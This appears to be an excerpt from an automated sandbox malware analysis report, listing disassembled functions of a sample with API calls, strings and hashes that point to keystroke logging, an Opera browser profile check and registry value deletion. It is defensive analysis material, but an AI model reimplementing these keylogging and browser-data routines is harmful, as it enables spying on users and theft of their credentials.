                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: AppData$\Opera Software\Opera Stable\
                          • API String ID: 1174141254-1629609700
                          • Opcode ID: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                          • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                          • Opcode Fuzzy Hash: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                          • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                          APIs
                          • GetKeyState.USER32(00000011), ref: 0040A597
                            • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                            • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                            • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                            • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                            • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                            • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                            • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                          • String ID: [AltL]$[AltR]
                          • API String ID: 3195419117-2658077756
                          • Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                          • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                          • Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                          • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                          APIs
                          • GetKeyState.USER32(00000012), ref: 0040A5F1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: State
                          • String ID: [CtrlL]$[CtrlR]
                          • API String ID: 1649606143-2446555240
                          • Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                          • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                          • Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                          • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteOpenValue
                          • String ID: 6h@
                          • API String ID: 2654517830-73392143
                          • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                          • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                          • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                          • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                          • GetLastError.KERNEL32 ref: 0043B4E9
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast
                          • String ID:
                          • API String ID: 1717984340-0
                          • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                          • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                          • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                          • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                          APIs
                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                          • SetLastError.KERNEL32(0000007F), ref: 004106DF
                          • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastRead
                          • String ID:
                          • API String ID: 4100373531-0
                          • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                          • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                          • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                          • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19